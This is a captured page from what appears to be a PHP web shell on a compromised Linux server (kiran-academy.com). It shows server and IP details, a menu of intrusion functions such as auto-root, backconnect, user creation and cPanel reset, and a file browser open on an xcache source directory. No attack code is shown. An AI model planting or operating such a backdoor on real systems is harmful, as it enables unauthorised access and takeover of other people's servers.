Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxrwxr-x
build
[ DIR ]
drwxr-xr-x
devel
[ DIR ]
drwxrwxr-x
htdocs
[ DIR ]
drwxrwxr-x
include
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxrwxr-x
mod_assembler
[ DIR ]
drwxrwxr-x
mod_cacher
[ DIR ]
drwxrwxr-x
mod_coverager
[ DIR ]
drwxrwxr-x
mod_decoder
[ DIR ]
drwxrwxr-x
mod_disassembler
[ DIR ]
drwxrwxr-x
mod_encoder
[ DIR ]
drwxrwxr-x
mod_optimizer
[ DIR ]
drwxrwxr-x
modules
[ DIR ]
drwxr-xr-x
processor
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
util
[ DIR ]
drwxrwxr-x
xcache
[ DIR ]
drwxrwxr-x
.deps
0
B
-rw-r--r--
AUTHORS
26
B
-rw-rw-r--
COPYING
1.47
KB
-rw-rw-r--
ChangeLog
11.9
KB
-rw-rw-r--
INSTALL
487
B
-rw-rw-r--
Makefile
23.56
KB
-rw-r--r--
Makefile.frag
2.05
KB
-rw-rw-r--
Makefile.frag.deps
5.49
KB
-rw-rw-r--
Makefile.fragments
9.8
KB
-rw-r--r--
Makefile.global
6.6
KB
-rw-r--r--
Makefile.objects
4.77
KB
-rw-r--r--
NEWS
3.51
KB
-rw-rw-r--
README
364
B
-rw-rw-r--
THANKS
385
B
-rw-rw-r--
acinclude.m4
78.62
KB
-rw-r--r--
aclocal.m4
303.59
KB
-rw-r--r--
config.guess
44.02
KB
-rwxr-xr-x
config.h
2.58
KB
-rw-r--r--
config.h.in
2.39
KB
-rw-r--r--
config.log
19.67
KB
-rw-r--r--
config.m4
4.59
KB
-rw-rw-r--
config.nice
118
B
-rwxr-xr-x
config.status
20.82
KB
-rwxr-xr-x
config.sub
34.94
KB
-rwxr-xr-x
config.w32
4.93
KB
-rw-rw-r--
configure
442.56
KB
-rwxr-xr-x
configure.in
4.58
KB
-rw-r--r--
gen_structinfo.awk
3.76
KB
-rwxrwxr-x
includes.c
108
B
-rw-rw-r--
includes.i
413.44
KB
-rw-r--r--
install-sh
0
B
-rw-r--r--
libtool
205.71
KB
-rwxr-xr-x
ltmain.sh
195.05
KB
-rw-r--r--
missing
0
B
-rw-r--r--
mkinstalldirs
0
B
-rw-r--r--
processor.out.c
498.99
KB
-rw-r--r--
run-tests.php
78.1
KB
-rw-r--r--
run-xcachetest
1.34
KB
-rwxrwxr-x
structinfo.m4
74.93
KB
-rw-r--r--
xc_processor.c.h
498.99
KB
-rw-r--r--
xc_processor.h
9.06
KB
-rw-r--r--
xcache-test.ini
656
B
-rw-rw-r--
xcache-zh-gb2312.ini
2.51
KB
-rw-rw-r--
xcache.c
25.44
KB
-rw-rw-r--
xcache.h
709
B
-rw-rw-r--
xcache.ini
3.04
KB
-rw-rw-r--
xcache.la
788
B
-rw-r--r--
xcache.lo
303
B
-rw-r--r--
xcache_globals.h
1.29
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xcache_globals.h
#include "util/xc_stack.h" ZEND_BEGIN_MODULE_GLOBALS(xcache) zend_bool initial_compile_file_called; /* true if origin_compile_file is called */ zend_bool cacher; /* true if enabled */ zend_bool stat; zend_bool experimental; #ifdef HAVE_XCACHE_OPTIMIZER zend_bool optimizer; /* true if enabled */ #endif #ifdef HAVE_XCACHE_COVERAGER zend_bool coverager; zend_bool coverager_autostart; zend_bool coverager_started; HashTable *coverages; /* coverages[file][line] = times */ #endif #ifndef ZEND_WIN32 pid_t holds_pid; #endif xc_stack_t *php_holds; zend_uint php_holds_size; xc_stack_t *var_holds; zend_uint var_holds_size; time_t request_time; long var_ttl; #ifdef IS_UNCODE zval uvar_namespace_hard; zval uvar_namespace_soft; #endif zval var_namespace_hard; zval var_namespace_soft; zend_llist gc_op_arrays; #ifdef ZEND_ACC_ALIAS zend_llist gc_class_entries; #endif #ifdef HAVE_XCACHE_CONSTANT HashTable internal_constant_table; #endif HashTable internal_function_table; HashTable internal_class_table; zend_bool internal_table_copied; void *sandbox; zend_uint op_array_dummy_refcount_holder; ZEND_END_MODULE_GLOBALS(xcache) ZEND_EXTERN_MODULE_GLOBALS(xcache) #ifdef ZTS # define XG(v) TSRMG(xcache_globals_id, zend_xcache_globals *, v) #else # define XG(v) (xcache_globals.v) #endif
Close